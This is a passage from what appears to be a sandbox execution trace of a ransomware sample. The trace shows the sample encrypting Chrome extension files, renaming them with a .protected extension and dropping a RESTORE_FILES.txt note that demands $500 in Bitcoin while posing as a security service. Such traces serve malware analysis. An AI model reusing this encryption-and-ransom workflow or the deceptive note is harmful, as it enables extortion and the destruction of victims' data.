(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.753] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.753] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.753] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.753] CloseHandle (hObject=0x164) returned 1 [0078.753] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0078.753] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 141 [0078.753] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0078.753] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0078.753] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*") returned 143 [0078.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.754] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\.") returned 143 [0078.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\..") returned 144 [0078.754] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.754] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.754] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.754] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.754] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.755] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe9, lpOverlapped=0x0) returned 1 [0078.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe9, lpOverlapped=0x0) returned 1 [0078.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.756] CloseHandle (hObject=0x168) returned 1 [0078.756] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected") returned 165 [0078.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected")) returned 1 [0078.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.757] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.757] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0078.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.757] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.757] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.758] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.758] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.758] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.758] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.758] CloseHandle (hObject=0x164) returned 1 [0078.758] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0078.758] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 141 [0078.758] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0078.758] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0078.758] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*") returned 143 [0078.758] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.758] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.758] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.758] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\.") returned 143 [0078.758] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.758] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.759] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.759] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.759] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\..") returned 144 [0078.759] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.759] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.759] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.759] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.759] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.759] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.759] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.760] CloseHandle (hObject=0x168) returned 1 [0078.761] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected") returned 165 [0078.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected")) returned 1 [0078.761] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.761] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.761] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0078.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.762] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.762] lstrlenA 